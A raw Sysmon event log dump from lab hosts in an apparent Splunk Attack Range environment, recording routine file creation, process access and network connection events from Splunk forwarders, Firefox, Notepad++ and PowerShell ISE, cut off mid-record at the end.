07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.507{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C3341BC932D61AC4EFF0B61CE78382A,SHA256=3CB635BC1AF5C93EDFEEDDAF41AAD2C2A79B5361745E89CE853477B62257B75B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50A3071FDCC815EC5D1481FA594828A0,SHA256=7B41CE98B174C5DD14585C849D6B425DC74AC9F7B4398F0AB8C8D0C9C3FB3727,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:56.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8947417F7DBC0E3C6C97181B868F3CA,SHA256=BA345B020BE1699B8CDB1F7B97F5F94413E45933A97FD266DADE656153521578,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.632{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51064-false10.0.1.12-8000- 23542300x80000000000000001049881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:56.906{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=EC36445458EF3886C65ED208690EC0A4,SHA256=12FC02A80DD6E948A37EBC0B8E26E5B220A0B868EE97A354D3CDFACECB3EF448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:56.322{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4A43B1B8C5774ACC230191A3565B779,SHA256=9ECC76AA07839A2E7BAE669FF60C89B48C95FAE530409672508822E71F78C010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:57.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02D18B23A348EEDE2A583902E019A96E,SHA256=7C3D108B4B67BECD4885F85CE852430CDC7C4366C1DD8FB85FCEAA1E28A73C64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.821{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D4D41712001D13AD00203A5580F20352,SHA256=DA4CB77822E043A95A4A678743084B9AE2CE935650B1E20F3EFD766ED02E7D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.821{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=51B457DD756C34E9ABCA621BE7818420,SHA256=DE5437C2F75E919D1CD06C43358D44C1EF0204BF35B8DDBA7034E81458157866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.821{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=405DA19AB766F97B968EF73AF7D79B6D,SHA256=59CBCE63746B6CADE719E9BE1977D6B2C10345E6BACC310468E830401851C7B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8D491442B0D39B52D7BB48B77E09DB82,SHA256=20BAA3BD5E649103ABCDFC8E908FCC757795BB0EDE766CFB3DC5EC4639F6912C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=06A90A5E56578EC5C8B877DF6AA2B05E,SHA256=C4A358DD8F6C2444724C0FEAFA819C6EA6497CE692546378F264D2A79E5D24F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3C15162E18FC129796FDD919C2A893D1,SHA256=7427584ADE3300EACA5C8AB1CA72A5AFCB62D4C3B8160A678ABC0522340D674B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C2B46FF5E335DBD1FCFE69335B75BAB7,SHA256=8153A3D3DD313F54B39A55BADEF8148797A5D1BC69FB90DB230CCDF26FFA0AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F2E9D027FFD41CFE43F0B0B05986A90C,SHA256=01074738F62E98E40CA54BBC372DEB9C4812EA99263101AB2A3D300BA73940D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=467963F2901561E7A3381E1AE0D13715,SHA256=9C38DBA59E9FD5C8F9CBC50EE00D9E66D598584F3EDED13A05B1DC186F65354F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE62F2C0D2ACFE33ABE86A001DE57EC9,SHA256=489551DF135C12EB6209DC85E060D698EBD0D9830BABA8A27534D5A407739075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FE2D65BFE88DD859AE14DE245ED5D135,SHA256=152F838A1FC893B7BA2FCEE50E648569190FFC83E8C999EC86020B38262B25E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05C07E0F31528CF95E1ED179F763BFF1,SHA256=D218906BF19F3269B2FAFAADE9F82FEED765996270714398820B9DF1E5EB9DF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.037{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:58.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8234F99BB0F81EA6B5B4561AF2B9F6DA,SHA256=7527B754811AA4EC9B2DCD2FC2BF12BE8744C23849C7E4BEE755A4C282548849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:58.351{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2828A9502C973FA634952D05C300D7C9,SHA256=C8DF22E9F4F5059987285B24482C5DF2CB2CD88327C2396BAE50C20A56EE1791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:58.151{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf6bc67e.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C18270EF8077FB5A63FF202165F354C3,SHA256=728C94355C54E3F535759AC623C62F627070A7A4D4E1CEA3185423BA9AB3256E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:59.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB9B0BB6355740ED8DE9EF707EA27B89,SHA256=571745377536B863D68B01109BF15644F8CB556880DCFEEA9285542DFC48AA14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.561{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51065-false10.0.1.12-8089- 23542300x8000000000000000808042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:00.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE9D07FCAE8E5D941F428F41E9227D,SHA256=DA08381FC892A5515F4ED2AD388CB644058EC4BAFB8CA24FBB51030C6698A9C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.728{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57299-false10.0.1.14win-dc-890.attackrange.local49676- 10341000x80000000000000001049905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001049902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001049901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6bd042.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F8B7C7981A41553E667229BC855F07F,SHA256=52B397C3712102B4D9764F20A37A6CC1EE1FCF45E251D0C53B72B5BEF1BE2EEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:00.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9217A22E84A9FC901D826348FED3EA98,SHA256=6B572022D0EAD435E0C1CBAB5E938E7F23380B1FC12BAC3DDBEDF32C4702049C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:00.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=431EED760382CD39F5766B2D889044D8,SHA256=4BB80BDEC6C930DD103AA39D55555F51B40D575B14044E27C63A03968E80A9B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.039{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-7849-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:01.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=142AA9A44FF9F87720FC34C22B55E2A2,SHA256=929BDB023ACA5934873E5F9386906CC037119F53A79292D4398CC06F0E4D4FFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.746{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51066-false10.0.1.12-8000- 23542300x80000000000000001049907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:01.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AA1A08B7BDA7BAB5158B0FEDE90FAF,SHA256=77D9CAB92EFAD761C1FFF5A19F9B3BCB0B9341DAC0343BD578F87A9C6244F73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:02.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A26A33BE965D5FFB26EE9883EB06E6B5,SHA256=9FB727D7978E793B0260AB8961583A58A2D423B0F926C34A47B6F23F54A7BE96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:02.391{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE147FEF02ECCE36FB58AAE72C2E2DDB,SHA256=B72EC90B28DAC00E8DF44FD89F225DBE915274850852220C711557708C38B83A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.405{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57300-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.337{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57299-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:03.960{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28BB8C7EB70AE960E3094B00CC46E82B,SHA256=EE1F9243AA75037CDE056842A71E1DDE9C81DE0372DAB08C0FAB899273EE6612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:03.406{466BC892-02CE-60E8-7600-00000000CF01}3400NT 